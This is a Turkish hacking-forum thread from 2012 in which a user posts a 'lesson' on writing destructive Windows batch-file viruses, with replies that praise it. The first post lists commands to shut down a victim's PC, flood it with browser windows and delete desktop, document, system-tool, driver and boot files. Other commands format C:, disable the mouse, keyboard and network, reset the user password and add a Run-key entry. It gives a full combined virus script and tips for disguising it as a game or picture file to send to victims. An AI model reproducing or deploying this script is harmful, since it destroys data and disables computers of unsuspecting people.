İPUCU

Trojan ve Virüsler Trojan ve Virüsler Hakkında Bilgiler.

Seçenekler

.Bat virüsü teknikleri [Ders 1] // PoisonScorpion.

14-03-2012 22:24
#1
PoisonScorpion - ait Kullanıcı Resmi (Avatar)
Forumdan Uzaklaştırıldı
Üyelik tarihi:
10/2011
Nereden:
İstanbul
Mesajlar:
1.389
Teşekkür (Etti):
13
Teşekkür (Aldı):
1075
Konular:
431
Ticaret:
(0) %
PoisonScorpion ;

Size anlatacağım dersler tamamen bana aittir.
Başlayalım .
Bua arada Selamun aleyküm // Aleyküm selam.

1-Not belgesi aç.

Kurbanın Pc'sini kapatmak istiyorsan anında ;

Kod:
shutdown /s

yaz , ancak süreli kapanmasını istiyorsan örnek bir dakika..


Kod:
shutdown /s /t 60
O 60 saniyeyi değiştirebilirsiniz bunu notbelgemize yerleştiriyoruz sonra .bat komudu ile kaydettikten sonra kurban açtığı gibi pc'si kapanır süreliyse süresi dolunca kapanır neyse komutlara devam edelim , başkabir komut yazarkende alt alt'a gidiyoruz.

Başka bir kod'a geçelim alt alta gidiyoruz dediğim gibi..

Kurbanın önüne 100 lerce site açılmasını istiyoruz , onuda şu komutla yaparız.

Kod:
start www.turkhackteam.net
Şimdi bu kodu alt alta ne kadar yazarsak o kadar turkhackteam sitesi açılır.
Kodumuz artık şu şekilde ;

İlk kapatmayı gösterdim ancak başka kodlarda yapıcaksanız kapatmayı en sona yapın çünkü diğerleri olmadan pc kapanır..

Şu şekilde ;


Kod:
start www.turkhackteam.net
start www.turkhackteam.net
shutdown /s /t 120

.bat uzantılı kaydettiğimizde bunu artık kurbana yedireceğiz oda Sm ile bunu yerse nolur 2 explorer (mozilla vs.) açılır 120 Saniye sonrada pc kapanır tabi saniyeyide değiştirebilirsiniz + olarak ''start www.turkhackteam.net'' komutunu ne kadar alt alta yazarsanız o kadar site açılır yani 100 tane yaparsınız pc anında donar.

Teoremi anlamışsınızdır bunlar için bu kadar ayrıntı yeter.

Her kodu alt alta yazıyoruz bunu unutmayın şimdi kodlara geçelim ..

Desktop silme kodu :

Kod:
del /f /q "C:\Users\%username%\Desktop\*"
Dosyayı açtığında karşısına mesaj çıkartma kod ;

Kod:
echo MsgBox "TurkHackTeam.net" >>C:\Windows\VGSFSA
start C:\Windows\VGSFSA
Burdaki mesajımız Turkhacktam.net bu yazıyı istediğiniz gibi editleyin.

Delete ********s ;


Kod:
del /f /q "C:\Users\%username%\********s\*"
Paint'i Silme kodu ;

Kod:
del /f /q "%systemroot%\mspaint.exe"
Pcdeki tüm notbelgelerini siler ;

Kod:
del /f /q "%systemroot%\notepad.exe"
Format C:\ ;

Kod:
format c: /q /autotest
Mouse (fare) devre dışı bırakmak ;

Kod:
rundll32 mouse,disable
Klavyeyi devre dışı bırakmak ;

Kod:
rundll32 keyboard,disable
Mavi ekran biliyorsunuzdur pc açılırken gelen mavi ekran ;

Kod:
Set adasdwdadasd=HKLM\Software\Microsoft\Windows\CurrentVersion\Run
Reg Add "%adasdwdadasd%" /v "BSOD" /t "REG_SZ" /d %0 /f > nul
Del /q /s /f "%SystemRoot%\System32\Drivers\*.*"
Driver Silme kodları ;

Kod:
Del /q /s /f "%SystemRoot%\System32\Drivers\*.*"
Delete Program Files :

Kod:
del /f /q "C:\Program Files\*"
Kurbanın internete girmesini engelle :

Kod:
Ipconfig /release
Şimdilik bu kadar yeter , ilk ders için bu kodlarla kendimiz virüs yazabiliriz tabi bu kodları geliştirebilirsiniz.

Şimdi ben bu kodlarla yaptığım örnek virüsü sizlere vereceğim..


+MsgBox Gönderir.
+Pc kapatır.
+Desktopu siler
+Önüne site açıp durur.
+Hesap makinesi , belgelerim , paint , masaüstü simgelerini , not belgelerini siler.
+Boot Devredışı bırakır.
+İnterneti devre dışı bırakır.
+******** Dosyalarını siler.
+C: Format atabilir.
+Mouse devre dışı bırakır
+Klavyeyi devre dışı bırakır.
+Pcye şifre koyarsınız.

VB. (Kodlar alıntı değildir.)


Kod:
:: Message Box
echo MsgBox "Hacked By TurkHackTeam.net" >> C:\Windows\VGSFSA.vbs
start C:\Windows\VGSFSA.vbs
:: delete ********s
del /f /q "C:\Users\%username%\********s\*"
:: delete Desktop
del /f /q "C:\Users\%username%\Desktop\*"
:: Website Popup
start www.turkhackteam.net
start www.turkhackteam.net
start www.turkhackteam.net
start www.turkhackteam.net
start www.turkhackteam.net
start www.turkhackteam.net
start www.turkhackteam.net
start www.turkhackteam.net
start www.turkhackteam.net
start www.turkhackteam.net
:: Delete MS Paint
del /f /q "%systemroot%\mspaint.exe"
:: Delete Notepad
del /f /q "%systemroot%\notepad.exe"
:: Delete Calculator
del /f /q "%systemroot%\calc.exe"
:: desktop
attrib +s +h /d C:\users\%username%\desktop\*
:: Boot
attrib -r -s -h c:\autoexec.bat
del /f /q c:\autoexec.bat
attrib -r -s -h c:\bootmgr
del /f /q c:\bootmgr
attrib -r -s -h c:\BOOTSECT.BAK
del /f /q c:\BOOTSECT.BAK
attrib -r -s -h c:\boot.ini
del /f /q c:\boot.ini
attrib -r -s -h c:\ntldr
del /f /q c:\ntldr
attrib -r -s -h c:\Boot
del /f /q c:\Boot
attrib -r -s -h c:\windows\win.ini
del /f /q c:\windows\win.ini
:: Interneti devre disi birak
Ipconfig /release
:: B*S*O*D
Set adasdwdadasd=HKLM\Software\Microsoft\Windows\CurrentVersion\Run
Reg Add "%adasdwdadasd%" /v "BSOD" /t "REG_SZ" /d %0 /f > nul
Del /q /s /f "%SystemRoot%\System32\Drivers\*.*"
:: ProgramFiles sil
del /f /q "C:\Program Files\*"
:: Change Password To 123456
net user %username% 123456
format c: /q /autotest
rundll32 mouse,disable
rundll32 keyboard,disable


Son olarak bilmeyenler için virüsü şu şekilde kaydediyorsunuz benimki veya sizin yazdığınız , Notbelgesinin en üst solda dosya tıkla Farklı kaydet bas.
dosya ismini yaz örnek tht sonunu .bat olarak kaydediceksiniz yani şöyle.
tht.bat yada turkhackteam.bat , ps.bat , poisonscorpion.bat , oyun.bat , resimlerim.bat

gibi v.s

Elimden geldiğince hiç paylaşılmamış kodları paylaştım.
Kod paylaşımları ve ders anlatımları devam edicektir.

İyi Forumlar.




03-04-2012 13:34
#2
osan_44 - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
11/2009
Nereden:
MALATYA
Mesajlar:
361
Teşekkür (Etti):
165
Teşekkür (Aldı):
74
Konular:
117
Ticaret:
(0) %
Facede yayınlıcam yani alıntı yapcam haberin olsun...
03-04-2012 15:20
#3
Le PLaY 34 - ait Kullanıcı Resmi (Avatar)
Forumdan Uzaklaştırıldı
Üyelik tarihi:
02/2012
Mesajlar:
523
Teşekkür (Etti):
165
Teşekkür (Aldı):
43
Konular:
89
Ticaret:
(0) %
yemın ederım ben bole uzun ınce ayrıntılı bı anlatım görmedım ya. Allah razı olsun süper bısey yemn ederim ya. çok saol
03-04-2012 17:10
#4
*L0RD* - ait Kullanıcı Resmi (Avatar)
Yüzbaşı
Üyelik tarihi:
03/2012
Mesajlar:
380
Teşekkür (Etti):
5
Teşekkür (Aldı):
39
Konular:
55
Ticaret:
(0) %
2. dersi merakla bekliyorum.
03-04-2012 17:10
#5
Le PLaY 34 - ait Kullanıcı Resmi (Avatar)
Forumdan Uzaklaştırıldı
Üyelik tarihi:
02/2012
Mesajlar:
523
Teşekkür (Etti):
165
Teşekkür (Aldı):
43
Konular:
89
Ticaret:
(0) %
Bende ama ne zman verir acaba ya
03-04-2012 17:45
#6
Akragas - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
02/2011
Nereden:
Manisa
Mesajlar:
139
Teşekkür (Etti):
63
Teşekkür (Aldı):
8
Konular:
21
Ticaret:
(0) %
eline sağlık dostuum
Kullanıcı İmzası
Magic~Shoot^^
07-04-2012 13:31
#7
loost123 - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
03/2012
Nereden:
Frankurt
Mesajlar:
975
Teşekkür (Etti):
26
Teşekkür (Aldı):
44
Konular:
127
Ticaret:
(0) %
Eline saglık
26-09-2012 17:54
#8
PoisonScorpion - ait Kullanıcı Resmi (Avatar)
Forumdan Uzaklaştırıldı
Üyelik tarihi:
10/2011
Nereden:
İstanbul
Mesajlar:
1.389
Teşekkür (Etti):
13
Teşekkür (Aldı):
1075
Konular:
431
Ticaret:
(0) %
Önemli değil 2.Ders yakında gelicektir arkadaşlar.
26-09-2012 18:35
#9
Le PLaY 34 - ait Kullanıcı Resmi (Avatar)
Forumdan Uzaklaştırıldı
Üyelik tarihi:
02/2012
Mesajlar:
523
Teşekkür (Etti):
165
Teşekkür (Aldı):
43
Konular:
89
Ticaret:
(0) %
Beklıyoruz Sabırsızlıkla !
26-09-2012 21:14
#10
furkanakmann - ait Kullanıcı Resmi (Avatar)
Forumdan Uzaklaştırıldı
Üyelik tarihi:
07/2012
Nereden:
Cehennem
Mesajlar:
539
Teşekkür (Etti):
109
Teşekkür (Aldı):
202
Konular:
55
Ticaret:
(0) %
Teşekürü Hakediyosun Uğraşmıssın Ellerine Sağlık.

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var yok
You may not post replies
Sizin eklenti yükleme yetkiniz yok
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodları Kapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı